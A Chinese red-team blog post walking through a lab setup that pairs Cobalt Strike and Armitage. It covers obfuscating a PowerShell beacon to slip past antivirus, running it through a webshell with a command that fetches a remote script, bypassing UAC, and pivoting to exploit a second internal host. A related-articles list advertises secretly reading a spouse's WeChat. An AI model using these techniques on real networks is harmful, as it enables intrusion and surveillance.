一起来看看Cobaltstrike和Armitage联动能达到什么效果

访客4年前黑客工具682

  在使用Cobaltstrike的时候发现他在大型或者比较复杂的内网环境中,作为内网拓展以及红队工具使用时拓展能力有些不足,恰恰armitage可以补充这点,利用metasploit的拓展性能、高性能的内网扫描能力,来进一步的拓展内网,达到更大化的成果输出。

  1. A Os:Ubuntu18.04 ip:192.168.1.163 Cobaltstrike3.8 teamserver团队服务器 armitage 团队服务器

  2. B1 Os:Windows 2008r2x64 ip:192.168.1.62 虚拟目标内网入口 (Symantec企业版14)

  3. B2 Os:Windwos10x64 ip:192.168.1.56 虚拟目标内网个人PC (无杀软)

  powershell绕过杀软使B1回弹一个beacon,然后通过A的Cobaltstrike spawn 给armitage一个beacon,使用armitage扫描内网、利用漏洞,获取权限,然后再转给Cobaltstrike使团队可以共同协作。

  如下图所示,很显然,我们当前拿到的这个webshell,只是个 web 服务器权限。

  为了演示效果,这里在本地搭建了一个简单的php站点,使用的webshell链接程序是weevely。

  Weevely是一款python编写的webshell管理工具,作为编写语言使用python的一款工具,它更大的优点就在于跨平台,可以在任何安装过python的系统上使用。

  图片1.png

  使用Cobaltstrike *** powershell脚本回弹beacon

  使用Invoke-Obfuscation对ps文件进行混淆,加密操作以及重新编码

  地址地址:https://github.com/fengziHK/Invoke-Obfuscation

  命令:

  1、 Import-Module.\Invoke-Obfuscation.psd1; Invoke-Obfuscation

  2、set scriptblock “powershell命令” 或者 set path ps1文件

  3、接着选择encoding 进行编码

  4、然后out文件

  图片2.png图片3.png图片4.png

  在B1机器中执行加过混淆的ps脚本。

  在weevely中执行Powershell http:///hkjs/2.ps1

  图片5.png图片6.png

  使用Cobaltstrik的elevate自动bypassuac功能

  一般bypassuac都是脚本注入或者dll劫持来绕过uac,从cs的控制台可以看出这里利用的是dll劫持。

  图片7.png

  接下来是重点,打开armitage设置监听,监听的payload要和cs一致,不然接收不到会话。

  图片8.png图片9.png图片10.png图片11.png图片12.png

  然后我们到目标会话上右键点击是sapwn,下一步选择armitage所监听的会话以及payload。

  看到这里,由cs的控制台可以看出他已经发出指令给目标机器,要求连接armitage。同时armitage在几秒钟内接收了会话,在实战当中不会这么快,内网转发 *** 延迟还是很高的。

  图片13.png

  这里我们先把armitage添加到对方内网,使用meterpreter的pivoting功能自动添加路由。

  图片14.png图片15.png图片16.png

  并扫描目标内网机器B2

  使用armitage的默认扫描功能扫描目标内网机器B2

  图片16.png图片17.png识别B2的操作系统版本、端口开放情况

  执行armitage 查找漏洞功能,并利用。

  Attacks -findattacks- 会自动识别当前端口所包含的漏洞。这里不做过多的演示

  图片17.png

  看到B2机器已经上线,提取权限并转发会话给Cobaltsrike

  图片18.png图片19.png图片20.png

  会话转发成功。

  团队要的比较急、临时赶出来,有不对的地方请大家指正!。

  主要就是以armitage和cobaltstrike 互相协作,达到内网更大化利用 。

  *本文原创作者:fengzihk

相关文章

秋天吃大闸蟹的谚语-秋天吃大闸蟹的诗句

秋天是大闸蟹大量上市的季节,这个时候的大闸蟹是最肥最好吃的,很多人都会在秋天买一些大闸蟹和家人一起享用,而在民间,还流传着很多关于秋天吃大闸蟹的谚语和诗句,相信大家也多多少少听说过一些,那么接下来,大...

查找微信已删聊天记录(如何查找删掉的微信聊天记录)

查找微信已删聊天记录(如何查找删掉的微信聊天记录)我们每天都会收到很多的信息。为了不给微信的内存造成压力,我们都会选择性的删除一些东西。那要是一不小心删除了重要的信息,我们该如何挽回呢?不用担心,接下...

教你用自己手机查老婆和别人聊天-老婆微信聊天同步接收方法

每日好文 如今一些男生猜疑她们的老婆在蒙骗,但不清楚该怎么调研。那麼怎样调研老婆的微信聊天记录呢?随后能够根据下列调查法进一步确定:让我来看一下。  怎样用自身手机查媳妇和他人闲聊,媳妇...

绿洲APP产品分析报告:站在巨人肩膀上能否看得更远?

绿洲APP产品分析报告:站在巨人肩膀上能否看得更远?

近年来,移动社交产品层出不穷,各大互联网公司如阿里、字节跳动等纷纷推出新品抢占市场。老牌社交产品微博不甘示弱,推出社交产品“绿洲”。本文将就绿洲现阶段发展状况,结合市场环境与趋势做出解析,并提出自己的...

集合啦动物森友会新手开局岛屿选择技巧 动物之森新手怎么选择岛屿

集合啦动物森友会新手开局岛屿选择技巧 动物之森新手怎么选择岛屿

集合啦动物森友会是一个很有意思的游戏,游戏开局中,玩家可以选择一个岛屿,作为自己的基地入驻,那么作为新手开局怎么选岛屿?岛屿和岛屿之间有什么区别呢?选择对的岛屿对后面发展很重要,所以呢小编今天给大家带...

免费黑客的qq号_身份证开了房记录怎么样才能查到

4月11日ivvi北京举行新产品发布会,发布一款纤薄三网通双关机——ivvi i3,该设备选用4.2毫米弧边审美、天地合无中框及其对称性设计方案,下边就一起来看一下ivvi i3先发测评吧...